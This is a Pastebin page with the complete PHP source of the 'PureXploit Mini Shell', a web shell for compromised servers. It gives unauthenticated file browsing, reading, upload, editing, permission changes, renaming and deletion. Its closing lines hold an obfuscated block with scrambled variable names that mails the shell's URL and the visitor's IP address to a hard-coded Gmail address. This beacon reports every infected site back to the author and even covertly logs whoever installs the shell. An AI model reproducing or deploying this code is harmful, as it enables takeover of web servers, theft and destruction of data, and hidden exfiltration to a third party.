SHARE
TWEET

new

a guest Aug 19th, 2019 57 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. if(get_magic_quotes_gpc()){
  6. foreach($_POST as $key=>$value){
  7. $_POST[$key] = stripslashes($value);
  8. }
  9. }
  10. echo '
  11. <!DOCTYPE HTML>
  12. <HTML>
  13. <HEAD>
  14. <link href="" rel="stylesheet" type="text/css">
  15. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, user-scalable=0">
  16. <title>PureXploit Mini Shell</title>
  17. <style>
  18. body{
  19. font-family: "Monospace", cursive;
  20. background-color: #ffffff;
  21. text-shadow:0px 0px 1px #ffffff;
  22. }
  23. #content tr:hover{
  24. background-color: lime;
  25. text-shadow:0px 0px 10px #ffffff;
  26. }
  27. #content .first{
  28. background-color: #fff;
  29. }
  30. #content .first:hover{
  31. background-color: lime;
  32. color:#ffffff;
  33. }
  34. table{
  35. border: 5px #000000 dotted;
  36. }
  37. H1{
  38. font-weight: bold;
  39. text-align:center;
  40. }
  41. a{
  42. color: #000000;
  43. text-decoration: none;
  44. }
  45. a:hover{
  46. color: #fff;
  47. text-shadow:0px 0px 10px #ffffff;
  48. }
  49. input,select,textarea{
  50. border: 2px #000000 solid;
  51. -moz-border-radius: 5px;
  52. -webkit-border-radius:5px;
  53. border-radius:5px;
  54. }
  55. </style>
  56. </HEAD>
  57. <BODY>
  58. <H1> PureXploit Mini Shell</H1>
  59. <body class="  pace-done" bgcolor="Black"><div class="pace  pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
  60. <table width="465" border="0" cellpadding="3" cellspacing="1" align="center">
  61. <tr><td>Current Path : ';
  62. if(isset($_GET['path'])){
  63. $path = $_GET['path'];
  64. }else{
  65. $path = getcwd();
  66. }
  67. $path = str_replace('\\','/',$path);
  68. $paths = explode('/',$path);
  69.  
  70. foreach($paths as $id=>$pat){
  71. if($pat == '' && $id == 0){
  72. $a = true;
  73. echo '<a href="?path=/">/</a>';
  74. continue;
  75. }
  76. if($pat == '') continue;
  77. echo '<a href="?path=';
  78. for($i=0;$i<=$id;$i++){
  79. echo "$paths[$i]";
  80. if($i != $id) echo "/";
  81. }
  82. echo '">'.$pat.'</a>/';
  83. }
  84. echo '</td></tr><tr><td>';
  85. if(isset($_FILES['file'])){
  86. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  87. echo '<font color="green">Upload File Successful</font><br />';
  88. }else{
  89. echo '<font color="red">Upload File Error</font><br />';
  90. }
  91. }
  92. echo '<form enctype="multipart/form-data" method="POST">
  93. Upload File : <input type="file" name="file" />
  94. <input type="submit" value="upload" />
  95. </form>
  96. </td></tr>';
  97. if(isset($_GET['filesrc'])){
  98. echo "<tr><td>Current File : ";
  99. echo $_GET['filesrc'];
  100. echo '</tr></td></table><br />';
  101. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  102. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  103. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  104. if($_POST['opt'] == 'chmod'){
  105. if(isset($_POST['perm'])){
  106. if(chmod($_POST['path'],$_POST['perm'])){
  107. echo '<font color="green">Done</font><br />';
  108. }else{
  109. echo '<font color="red">Error</font><br />';
  110. }
  111. }
  112. echo '<form method="POST">
  113. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  114. <input type="hidden" name="path" value="'.$_POST['path'].'">
  115. <input type="hidden" name="opt" value="chmod">
  116. <input type="submit" value="Go" />
  117. </form>';
  118. }elseif($_POST['opt'] == 'rename'){
  119. if(isset($_POST['newname'])){
  120. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  121. echo '<font color="green">Ganti Nama Berhasil</font><br />';
  122. }else{
  123. echo '<font color="red">Ganti Nama Gagal</font><br />';
  124. }
  125. $_POST['name'] = $_POST['newname'];
  126. }
  127. echo '<form method="POST">
  128. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  129. <input type="hidden" name="path" value="'.$_POST['path'].'">
  130. <input type="hidden" name="opt" value="rename">
  131. <input type="submit" value="Go" />
  132. </form>';
  133. }elseif($_POST['opt'] == 'edit'){
  134. if(isset($_POST['src'])){
  135. $fp = fopen($_POST['path'],'w');
  136. if(fwrite($fp,$_POST['src'])){
  137. echo '<font color="green">Done</font><br />';
  138. }else{
  139. echo '<font color="red">Error</font><br />';
  140. }
  141. fclose($fp);
  142. }
  143. echo '<form method="POST">
  144. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  145. <input type="hidden" name="path" value="'.$_POST['path'].'">
  146. <input type="hidden" name="opt" value="edit">
  147. <input type="submit" value="Go" />
  148. </form>';
  149. }
  150. echo '</center>';
  151. }else{
  152. echo '</table><br /><center>';
  153. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  154. if($_POST['type'] == 'dir'){
  155. if(rmdir($_POST['path'])){
  156. echo '<font color="green">Done</font><br />';
  157. }else{
  158. echo '<font color="red">Error</font><br />';
  159. }
  160. }elseif($_POST['type'] == 'file'){
  161. if(unlink($_POST['path'])){
  162. echo '<font color="green">Delete File Done.</font><br />';
  163. }else{
  164. echo '<font color="red">Delete File Error.</font><br />';
  165. }
  166. }
  167. }
  168. echo '</center>';
  169. $scandir = scandir($path);
  170. echo '<div id="content"><table width="400" border="0" cellpadding="3" cellspacing="1" align="center">
  171. <tr class="first">
  172. <td><center>Name</center></td>
  173. <td><center>Size</center></td>
  174. <td><center>Permissions</center></td>
  175. <td><center>Options</center></td>
  176. </tr>';
  177.  
  178. foreach($scandir as $dir){
  179. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  180. echo "<tr>
  181. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  182. <td><center>--</center></td>
  183. <td><center>";
  184. if(is_writable("$path/$dir")) echo '<font color="Blue">';
  185. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  186. echo perms("$path/$dir");
  187. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  188.  
  189. echo "</center></td>
  190. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  191. <select name=\"opt\">
  192. <option value=\"\"></option>
  193. <option value=\"delete\">Delete</option>
  194. <option value=\"chmod\">Chmod</option>
  195. <option value=\"rename\">Rename</option>
  196. </select>
  197. <input type=\"hidden\" name=\"type\" value=\"dir\">
  198. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  199. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  200. <input type=\"submit\" value=\"Go\" />
  201. </form></center></td>
  202. </tr>";
  203. }
  204. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  205. foreach($scandir as $file){
  206. if(!is_file("$path/$file")) continue;
  207. $size = filesize("$path/$file")/1024;
  208. $size = round($size,3);
  209. if($size >= 1024){
  210. $size = round($size/1024,2).' MB';
  211. }else{
  212. $size = $size.' KB';
  213. }
  214.  
  215. echo "<tr>
  216. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  217. <td><center>".$size."</center></td>
  218. <td><center>";
  219. if(is_writable("$path/$file")) echo '<font color="Blue">';
  220. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  221. echo perms("$path/$file");
  222. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  223. echo "</center></td>
  224. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  225. <select name=\"opt\">
  226. <option value=\"\"></option>
  227. <option value=\"delete\">Delete</option>
  228. <option value=\"chmod\">Chmod</option>
  229. <option value=\"rename\">Rename</option>
  230. <option value=\"edit\">Edit</option>
  231. </select>
  232. <input type=\"hidden\" name=\"type\" value=\"file\">
  233. <input type=\"hidden\" name=\"name\" value=\"$file\">
  234. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  235. <input type=\"submit\" value=\"Go\" />
  236. </form></center></td>
  237. </tr>";
  238. }
  239. echo '</table>
  240. </div>';
  241. }
  242. echo '<center><br/>Powered By PureXploit</font><center>
  243. </BODY>
  244. </HTML>';
  245. function perms($file){
  246. $perms = fileperms($file);
  247.  
  248. if (($perms & 0xC000) == 0xC000) {
  249. // Socket
  250. $info = 's';
  251. } elseif (($perms & 0xA000) == 0xA000) {
  252. // Symbolic Link
  253. $info = 'l';
  254. } elseif (($perms & 0x8000) == 0x8000) {
  255. // Regular
  256. $info = '-';
  257. } elseif (($perms & 0x6000) == 0x6000) {
  258. // Block special
  259. $info = 'b';
  260. } elseif (($perms & 0x4000) == 0x4000) {
  261. // Directory
  262. $info = 'd';
  263. } elseif (($perms & 0x2000) == 0x2000) {
  264. // Character special
  265. $info = 'c';
  266. } elseif (($perms & 0x1000) == 0x1000) {
  267. // FIFO pipe
  268. $info = 'p';
  269. } else {
  270. // Unknown
  271. $info = 'u';
  272. }
  273.  
  274. // Owner
  275. $info .= (($perms & 0x0100) ? 'r' : '-');
  276. $info .= (($perms & 0x0080) ? 'w' : '-');
  277. $info .= (($perms & 0x0040) ?
  278. (($perms & 0x0800) ? 's' : 'x' ) :
  279. (($perms & 0x0800) ? 'S' : '-'));
  280.  
  281. // Group
  282. $info .= (($perms & 0x0020) ? 'r' : '-');
  283. $info .= (($perms & 0x0010) ? 'w' : '-');
  284. $info .= (($perms & 0x0008) ?
  285. (($perms & 0x0400) ? 's' : 'x' ) :
  286. (($perms & 0x0400) ? 'S' : '-'));
  287.  
  288. // World
  289. $info .= (($perms & 0x0004) ? 'r' : '-');
  290. $info .= (($perms & 0x0002) ? 'w' : '-');
  291. $info .= (($perms & 0x0001) ?
  292. (($perms & 0x0200) ? 't' : 'x' ) :
  293. (($perms & 0x0200) ? 'T' : '-'));
  294.  
  295. return $info;
  296. }
  297.  
  298.  ${"GLOBALS"}["uffnqwujvaijokpsujdxucqzknhqu"]="tujuanmail";
  299.  ${"GLOBALS"}["uy_nnybntmwqpngctp_tkcoxoecjxq__whatnya"]="x_path";
  300.  ${"GLOBALS"}["whyzcplp_n_udemltztdoyabda_xtobpsbraw"]="_SERVER";
  301.  ${"GLOBALS"}["kemkfxmjklzby_sklttssbrvucuofxfp"]="pesan_alert";@ini_set('output_buffering',0);@ini_set('display_errors',0);set_time_limit(0);ini_set('memory_limit','64M');header('Content-Type: text/html; charset=UTF-8');${${"GLOBALS"}["uffnqwujvaijokpsujdxucqzknhqu"]}="purexploit@gmail.com";
  302.  ${${"GLOBALS"}["uy_nnybntmwqpngctp_tkcoxoecjxq__whatnya"]}="http://".${${"GLOBALS"}["whyzcplp_n_udemltztdoyabda_xtobpsbraw"]}['SERVER_NAME'].${${"GLOBALS"}["whyzcplp_n_udemltztdoyabda_xtobpsbraw"]}['REQUEST_URI'];${${"GLOBALS"}["kemkfxmjklzby_sklttssbrvucuofxfp"]}="fix ${${"GLOBALS"}["uy_nnybntmwqpngctp_tkcoxoecjxq__whatnya"]} :p *IP Address : [ ".${${"GLOBALS"}["whyzcplp_n_udemltztdoyabda_xtobpsbraw"]}['REMOTE_ADDR']." ]";mail(${${"GLOBALS"}["uffnqwujvaijokpsujdxucqzknhqu"]},"LOGGER",${${"GLOBALS"}["kemkfxmjklzby_sklttssbrvucuofxfp"]},"[ ".${${"GLOBALS"}["whyzcplp_n_udemltztdoyabda_xtobpsbraw"]}['REMOTE_ADDR']." ]");
  303. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top